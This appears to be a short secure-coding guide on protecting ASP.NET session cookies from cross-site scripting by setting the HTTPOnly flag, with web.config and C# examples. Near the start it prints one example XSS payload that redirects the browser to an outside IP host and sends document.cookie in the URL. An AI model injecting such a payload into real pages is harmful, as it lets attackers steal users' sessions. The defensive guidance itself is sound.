During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim’s session.
window.location="http://126.96.36.199:81/r.php?u=" +document.links.text +"&l="+document.links +"&c="+document.cookie;
Cookies should be marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.
Below you can find some implementation examples:
If you use default ASP.NET Membership provider, you can mark the cookies from web.config:
<system.web> <compilation debug="true" targetFramework="4.0" /> <httpCookies httpOnlyCookies="true" requireSSL="true"/>
If you create cookies from code you can use the following property from cookie object:
HttpCookie cookie = new HttpCookie(Config.CookieName, id); cookie.Path = "/"; cookie.HttpOnly = true; // <-- burned in return cookie;